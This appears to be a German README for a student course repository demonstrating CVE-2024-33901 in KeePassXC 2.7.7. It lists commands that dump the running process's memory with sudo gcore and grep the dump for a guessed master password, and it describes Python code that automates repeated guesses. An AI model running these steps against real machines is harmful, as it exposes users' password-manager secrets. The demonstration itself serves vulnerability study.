
Kurzes Programm, das die Sicherheitslücke CVE-2024-33901 in KeePassXC Version 2.7.7 demonstriert
Kurzes Programm, das die Sicherheitslücke CVE-2024-33901 in KeePassXC Version 2.7.7 demonstriert
Der Bericht für den Kurs benötigt möglicherweise den verknüpften Quellcode, daher habe ich das Repository dafür erstellt
Dies kann erreicht werden, indem die PID ermittelt wird, was mit diesem Befehl erfolgen kann:
ps aux | grep keepassxc
Und dann führen Sie diesen Befehl aus: sudo gcore -o keepassxc_dump PID_HERE
Zum Beispiel, wenn die ermittelte PID 1234 war, dann müsste der Befehl lauten:
sudo gcore -o keepassxc_dump 1234
3. Abschließend können Sie diesen Befehl ausführen: cat keepassxc_dump.PID_HERE | strings | grep "password guess here"
Wenn die PID also 1234 war, wäre der Befehl:
cat keepassxc_dump.1234 | strings | grep "password guess here"
Sobald die Speicherabbilddatei erstellt ist, kann der Angriff durchgeführt werden, selbst wenn die Datenbank erneut gesperrt wird oder KeePassXC geschlossen wird.
Der bereitgestellte Python-Code führt alle diese Schritte aus und versucht mehrere Passwort-Raten basierend auf den bereitgestellten Textdateien.